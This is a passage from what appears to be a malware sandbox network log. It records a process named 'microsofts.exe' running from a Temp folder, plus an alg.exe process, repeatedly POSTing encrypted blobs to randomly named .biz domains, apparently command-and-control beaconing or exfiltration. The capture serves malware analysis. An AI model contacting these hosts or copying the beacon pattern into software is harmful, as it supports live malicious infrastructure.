Oct 20, 2024 18:42:35.348921061 CEST	778	OUT	Data Raw: 79 13 b1 43 3e 6c f0 eb fe 02 00 00 6b 4d 04 ce f8 70 22 7b cb 2b 08 b3 4b ca 62 30 e6 cb 54 f8 90 b3 51 83 47 71 5d 21 d6 7e b5 70 43 41 b6 2b 44 f3 af 11 41 22 a3 00 42 25 76 39 1c 30 76 9f 7f 91 63 fb d9 1c 64 c6 8b 79 87 4c 48 ce 96 66 da 77 Data Ascii: yC>lkMp"{+Kb0TQGq]!~pCA+DA"B%v90vcdyLHfw\|N6IEdU?_fEuHyXI8S[Q>y{zF(A_G&ZJ]y\GWcl:5w]/,JmuZV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
98	192.168.2.4	49976	208.100.26.245	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:36.052491903 CEST	347	OUT	POST /vmln HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yunalwv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:36.052501917 CEST	826	OUT	Data Raw: 73 1e 08 bd af 56 dc 05 2e 03 00 00 a7 f9 a5 78 65 48 5a 10 6a 29 ff e3 f8 68 b3 bd e7 e8 af 8b bb f0 69 9a bb 15 04 ac d7 92 3e 57 08 a9 fe 65 fc d0 0f 09 82 41 94 3b 7d 8c ea b4 ef 1e 1b a3 72 c1 8d 6d 7c 01 b0 0a 13 2b 13 85 66 ac dd b5 e4 8b Data Ascii: sV.xeHZj)hi>WeA;}rm\|+f]n=R8?d;lg4S0`d[1^r!2)~=i-~eC4?n!>y+Q}%7vbW&}2
Oct 20, 2024 18:42:36.907641888 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Sun, 20 Oct 2024 16:42:36 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
99	192.168.2.4	49981	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:36.801860094 CEST	356	OUT	POST /ngqgkogciouo HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:36.801945925 CEST	778	OUT	Data Raw: fb 11 02 07 20 4e 87 03 fe 02 00 00 40 8a 9e fd a0 5c 04 53 f8 50 63 38 80 ec ea 09 ea bf 5f 54 cf bf bb 43 bf 84 ec d4 0f d9 47 8c 3b ff 02 2d 06 6a bb 17 57 af 77 bf c5 11 c6 be 12 5a 09 09 d5 90 6c 45 b4 be 73 b0 f9 82 0e 67 a1 48 ac c1 44 f7 Data Ascii: N@\SPc8_TCG;-jWwZlEsgHDGX2trCNEd/?,><JMH`dgm"Gm{(&WEj-pm9`BW[SyIxN;lIk6Lymm)cg(u&_Li`A^OO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
100	192.168.2.4	49982	34.211.97.45	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:36.967818022 CEST	344	OUT	POST /mud HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:36.967818022 CEST	826	OUT	Data Raw: b2 30 82 d9 e0 d9 32 07 2e 03 00 00 7f ca 11 03 e8 b9 74 e2 fd 1b 1b 8a a1 cc 7e 26 2f cc f1 9c c9 91 0d 92 28 2d 20 43 c5 9b 81 cd 67 12 5e 37 0a 44 2f 4c 25 31 2c 05 2a 84 04 5b f2 04 3f e3 17 d9 e5 49 53 82 7b 66 68 8d 14 c7 55 c2 d7 37 22 99 Data Ascii: 02.t~&/(- Cg^7D/L%1,*[?IS{fhU7"/hlF"K/?zWN1l{$'u1e7D:CW-u6h=E\|KfpgOYn&T\|bj]&KS=7''tzBX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
101	192.168.2.4	49988	34.211.97.45	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:37.935146093 CEST	353	OUT	POST /bylbanfgrbak HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jpskm.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:37.935163021 CEST	826	OUT	Data Raw: 4b b2 57 8e 65 97 4f eb 2e 03 00 00 c4 85 f0 47 62 c4 3b 16 d1 80 4c 92 c8 a5 70 a6 20 0f c6 6f 73 ff 6f 3f 40 aa 87 f9 6a e6 f0 4a 51 1d e3 d2 59 90 3e bf 3d 1c 89 32 be 3d 67 a6 5a 82 65 cb 2e 2b 6b 2f ae 3c e8 28 65 80 87 6d 0d 6c 30 84 8e 4d Data Ascii: KWeO.Gb;Lp oso?@jJQY>=2=gZe.+k/<(eml0M8ys-r;Y$5@6[z~F#'CttQBmcLXp~IyiWNa>9T=;!79V;*<,:,ts[qRA0&=0?ppalN?d@C-+2:h/:
Oct 20, 2024 18:42:39.876163006 CEST	411	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:39 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=e7a6fc3819ed0a28e3f56de06ad4a2eb\|96.44.151.125\|1729442559\|1729442559\|0\|1\|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
102	192.168.2.4	49989	18.141.10.107	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:38.371686935 CEST	356	OUT	POST /rginqqoeriix HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: acwjcqqv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:38.371745110 CEST	778	OUT	Data Raw: 1c ea e0 cc ce ea de 1b fe 02 00 00 5b 20 c0 60 49 8f b5 75 f1 78 50 93 4f e3 66 57 64 59 99 00 6a db 70 9f fa b5 5c 47 16 cf 16 49 34 24 7d ed 94 b3 13 ca 5b 92 91 50 f3 0e 8f af 9f c9 b7 7a bb c0 49 a3 a9 80 8f 31 32 2d 2f 65 7f c1 41 0b e7 30 Data Ascii: [ `IuxPOfWdYjp\GI4$}[PzI12-/eA0RGk@]-(y6,_]H3/S/(bIwklH>DlyOFuxTa:fUO:_'n\|PN=t?AP,}%S3Hzl/J9+Gla]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
103	192.168.2.4	49997	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:39.914558887 CEST	348	OUT	POST /firf HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:39.914558887 CEST	826	OUT	Data Raw: 73 b7 f1 68 01 e6 18 12 2e 03 00 00 bb b2 08 f1 c4 68 cd f5 2f e2 d9 ae 13 7d b7 7d 88 fa 6a de 64 82 30 01 a3 17 28 71 f5 2c 8a d9 b3 23 a1 3d 67 69 0b 20 eb e0 31 2d 0f 00 09 30 27 65 91 27 80 fa 87 e2 45 f7 ee 96 d3 f6 50 1a 92 20 28 fe 8b 9e Data Ascii: sh.h/}}jd0(q,#=gi 1-0'e'EP ()%%> elN$l@q1OQ6`O"!VVh,]{729y\slmMorW59GDzy2}ofuD4\|m]vd!"Z

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
104	192.168.2.4	50001	44.213.104.86	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:40.405591965 CEST	347	OUT	POST /fkolun HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:40.405628920 CEST	778	OUT	Data Raw: 50 cf 52 39 e3 b9 eb a6 fe 02 00 00 e0 64 ad ac 38 68 e3 5a 19 84 1f d0 c4 fb 3f d5 c4 a1 aa 4c 2f 77 0f ec e9 c5 f1 90 fd e2 03 15 ce fc 13 6e ff d8 ae c2 e3 97 82 e3 43 7e 1d c5 4b b4 ea 9b 39 5b 20 84 2c 64 6e 2c ff 58 15 5f 5b 46 df 17 79 2d Data Ascii: PR9d8hZ?L/wnC~K9[ ,dn,X_[Fy-mdr\|hp4VN 0_Kd4Uo,8#N\|RNaD\|Q!4\A/lh4:urhH#2{l<N`\N[iHB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.4	50002	54.244.188.177	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:40.911015987 CEST	357	OUT	POST /gxaexbrilqhff HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lrxdmhrr.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:40.911072969 CEST	826	OUT	Data Raw: ec ab 20 59 d3 22 6a a8 2e 03 00 00 da b8 f0 a8 24 a6 46 29 e3 be 9c 19 ae 85 f6 f2 99 be b4 10 fe 24 56 87 b4 d1 cc d6 81 15 06 57 73 86 de 6a 26 40 00 aa 49 59 e4 d0 58 79 0e 32 b8 00 05 6f 69 d1 0c 70 2a dc d5 da 90 62 3e 7e 48 47 76 2b d0 87 Data Ascii: Y"j.$F)$VWsj&@IYXy2oipb>~HGv+LqCw.P{Jm>(cg;'Vaysukp\z nM_?MES/c$5ue= iy_i$5>1rN^IB/F,1^
Oct 20, 2024 18:42:42.383753061 CEST	414	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 20 Oct 2024 16:42:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=28af7108bb172f154bbb35e15476c9f4\|96.44.151.125\|1729442562\|1729442562\|0\|1\|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Set-Cookie: snkz=96.44.151.125; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.4	50003	44.213.104.86	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:41.015533924 CEST	342	OUT	POST /b HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: vyome.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:41.015533924 CEST	778	OUT	Data Raw: 60 a9 df 76 ba c6 47 4a fe 02 00 00 ab f8 c9 ad 17 d3 bf 1b d2 8f 8f 7a e6 0c 41 43 46 f6 ae fd 99 b0 8a e7 51 19 c0 da 82 98 8f 53 63 3e 4a 48 93 40 91 26 68 c0 3c 38 3d 28 ba fb c2 83 bf 76 ad 24 db 75 4b 96 e2 d7 39 e3 2f c5 d1 5d 4c 14 53 02 Data Ascii: `vGJzACFQSc>JH@&h<8=(v$uK9/]LS55!57pze1oabL>=0oLx$PX:56HIX_l\x:u{="O#(\|L5~<vL+t~f!rl{v{=>KPc"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.4	50012	18.208.156.248	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:42.226692915 CEST	348	OUT	POST /rmqv HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:42.226727009 CEST	778	OUT	Data Raw: 4f 95 40 fa 0b cb 9f 17 fe 02 00 00 67 b2 f1 ab e2 5f 3d 91 29 1e f7 5d 80 44 d4 df 2a 8c 0c a1 ec 3e 13 f1 df fb 20 b6 7e 5f 29 be f9 2a 7b 25 6a 65 dd 6d a4 18 58 c5 17 e8 f1 7d b0 d4 49 9b 60 22 aa e9 dc c6 f9 bc 5b 83 cb f3 71 48 99 c3 b4 7d Data Ascii: O@g_=)]D> ~_){%jemX}I`"[qH}F;,R0o~\7;n5x$_u!S{\l8'}Nf"[>4bErkIJ7V]cU=jebE%SDCWL,jf,eHVkQxK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.4	50013	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:42.414587975 CEST	346	OUT	POST /jrt HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:42.414902925 CEST	826	OUT	Data Raw: e0 84 9a 46 ac a8 d8 cb 2e 03 00 00 ac 4d 9f 1e 89 9c bb 09 46 3e d1 5b ae 23 e7 ff b3 71 cc 37 90 da 89 22 64 f1 33 c5 9e 1d 6f 33 0c 72 71 e6 49 6b fb 58 7a 95 29 af e5 f0 a6 db f0 9f 37 9e 94 6a 72 8c af 50 3d f4 66 68 20 6f dd fe 7e be cd b6 Data Ascii: F.MF>[#q7"d3o3rqIkXz)7jrP=fh o~/w^=gULf0\|`D,%`L"to3y-&A]T)[_+W[imd\~E{iw%=FuH=}H+K!

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.4	50015	18.208.156.248	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:43.199693918 CEST	353	OUT	POST /tkikmchfy HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: yauexmxk.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:43.199709892 CEST	778	OUT	Data Raw: a8 fe 26 62 07 be 94 55 fe 02 00 00 5c e0 39 42 c2 ec 96 f1 1f 0d c1 21 96 8a c9 73 f1 62 b2 53 24 c5 47 7e c3 de e7 77 a2 5b 24 d1 c6 a3 9f 77 82 7a 21 9f 3a 37 a2 ce ec aa d9 95 a3 5f b5 83 48 61 4e 00 04 fc 6e d3 79 87 75 33 9b 4d a9 7b 8d f0 Data Ascii: &bU\9B!sbS$G~w[$wz!:7_HaNnyu3M{>@7V=)HlrZdlh,q$@n?~:e61_is]Aa]k:(u0Ghm2>Z[a8YP"WFw'~+tv

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.4	50020	18.141.10.107	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:44.018575907 CEST	348	OUT	POST /qujmm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: wllvnzb.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:44.019069910 CEST	826	OUT	Data Raw: 34 3b dd c6 cf da f8 cd 2e 03 00 00 c1 2b 06 64 f5 2b 02 b0 b3 4d 37 f2 54 9f 72 f5 a4 e5 6d e0 c0 21 ed a3 c1 e8 3a 61 6f 81 41 c8 6d bd 20 80 0d b7 68 f3 37 e9 49 93 34 41 76 40 74 6a 76 f8 9c 73 54 29 35 10 2b 41 04 fe de d7 08 d9 51 e0 3e bc Data Ascii: 4;.+d+M7Trm!:aoAm h7I4Av@tjvsT)5+AQ>1/).4lTTR?'Oc(B[^2yxzaQFd^a>,gcI9:~K,\xj`tcrAGXn<\|[A\.u\I0Uq!]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.4	50021	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:44.372375011 CEST	355	OUT	POST /rcghpbxpojjll HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:44.372410059 CEST	778	OUT	Data Raw: ca cc 44 11 fe 6b f8 84 fe 02 00 00 42 40 af 02 ea d2 8d 81 bc d0 37 c4 64 3f 67 2c de 73 e3 bd b4 28 c1 f7 f6 7c 11 82 ac c6 22 97 7a 70 8a db ce 37 31 34 fe 7d 08 64 45 a8 36 bb 61 d2 f2 22 10 bf 47 2d 0b 35 ee 50 92 52 17 84 12 64 01 ac 4c 2b Data Ascii: DkB@7d?g,s(\|"zp714}dE6a"G-5PRdL+.tbU5N/Plf.Gf5A[NSb`YYL^z16C5ff{9s>%JIPlhAo>d\|g%thzc_7XnV+[ XyB

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.4	50029	18.208.156.248	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:46.097501993 CEST	343	OUT	POST /rw HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:46.097518921 CEST	826	OUT	Data Raw: e1 08 4d ff 56 38 4f 86 2e 03 00 00 40 ae 3d e6 b5 70 09 ab 3d 45 ef 52 67 00 e6 81 4a ae c3 ec 3f 23 98 c4 fd e9 d1 5c 29 28 c1 50 32 dd 0c 89 5b 9c fd 80 37 cd b1 47 e7 4f 56 c7 2a 9c a9 0c 7f 77 e0 67 e8 6f b8 f8 7f ff 54 f9 74 47 47 03 e1 b5 Data Ascii: MV8O.@=p=ERgJ?#\)(P2[7GOV*wgoTtGGJ(?dllj- \|PMM-rx>R&7.kQ=kU-f-$-zzB>+l"1pl"W[.#$Dy(N{6?.>]zPefe\|tM[1O<-{Oba

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.4	50030	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:46.106863976 CEST	344	OUT	POST /kx HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: iuzpxe.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:46.106909037 CEST	778	OUT	Data Raw: 82 cc dd 4b cf cd 63 60 fe 02 00 00 fd b6 5c 2d f5 37 44 f6 68 42 e4 00 94 64 02 9d ac 54 fa 0d 84 bb 8f 73 46 49 2c f7 85 fa 71 a9 6b 7c 01 7d b6 85 96 81 58 be e1 8d d3 2e a7 19 a1 0a 60 2d bf ac eb c1 96 29 44 82 3b 26 77 61 4e 39 91 d9 b5 92 Data Ascii: Kc`\-7DhBdTsFI,qk\|}X.`-)D;&waN9mA>mvW{}]&ulH]EzSI7MAxGqC.fq5?`Ur+3Seib*!%;gMo//RwhLf}I\e

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.4	50036	18.208.156.248	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:46.990226030 CEST	350	OUT	POST /aopjncgsm HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: gnqgo.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:46.990248919 CEST	826	OUT	Data Raw: 38 51 d5 4c 8f be 7a de 2e 03 00 00 80 5d a3 28 14 ac ac b5 76 6a 1a e2 be 26 ac 8b 2f 75 8b 92 d5 bb a1 a4 7d 7f 94 06 68 05 9c 97 ab 75 c5 83 a0 c9 58 ae 57 b5 9d 2a f3 f4 f3 24 4d 49 44 97 4e b7 12 46 af 77 e4 00 67 f1 6c 9b d2 fb 58 fe 2a fa Data Ascii: 8QLz.](vj&/u}huXW$MIDNFwglXd4fg9K]08aGYI~Z._7_:~)rbN>(,jkLtE%.eN8,MU)9Lq%At)Q$X

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.4	50042	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:47.936541080 CEST	356	OUT	POST /lkksdoxsvitr HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: jhvzpcfg.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 826
Oct 20, 2024 18:42:47.936561108 CEST	826	OUT	Data Raw: 46 63 ac 64 2e ee 89 97 2e 03 00 00 b0 7c 70 cb c7 63 51 6e 16 b6 4b 04 e9 e7 ea c0 c0 11 4c 9d ab 75 0b 0a a3 ad 66 fb 55 0d 38 7b 2e 61 ca 10 41 57 cc c7 bc e0 37 da 3e 51 82 f1 1b dc 83 6b 92 36 98 14 9a 3c 55 6b 9b af ac 2a bb 42 c7 88 5e 3e Data Ascii: Fcd..\|pcQnKLufU8{.aAW7>Qk6<Uk*B^>eZ>Q-ijUxZg>!kn<0\>+n'!`Rd6IA)K<FjqIY'(c%\|22GKu7W{VQ .

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.4	50043	13.251.16.150	80	7108	C:\Windows\System32\alg.exe

Timestamp	Bytes transferred	Direction	Data
Oct 20, 2024 18:42:48.156557083 CEST	349	OUT	POST /rkvg HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: sxmiywsfv.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
Oct 20, 2024 18:42:48.156583071 CEST	778	OUT	Data Raw: 35 df 2f 8c fd c2 18 51 fe 02 00 00 f4 58 e8 d1 ba 03 d9 56 a8 2c 8a 03 6e 7c b3 13 58 7b ab 11 72 e5 7f 2e 40 7c 39 20 22 5a fc d9 f2 62 97 a6 0b 4c 24 19 35 4b 6d bf 02 3e af de 85 d4 c6 81 0e 4c d5 fb 9b 55 f5 d4 84 c1 2b c1 2e 00 ba 6a c5 53 Data Ascii: 5/QXV,n\|X{r.@\|9 "ZbL$5Km>LU+.jSVW$7D9=.0D9uy%tBcxoZ.s.IiKgt\iHKe\|a;q02zisu\|spnH^}jT$`TO\|d7!E{*\

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.4	50047	44.221.84.105	80	2172	C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp	Bytes transferred	Direction	Data
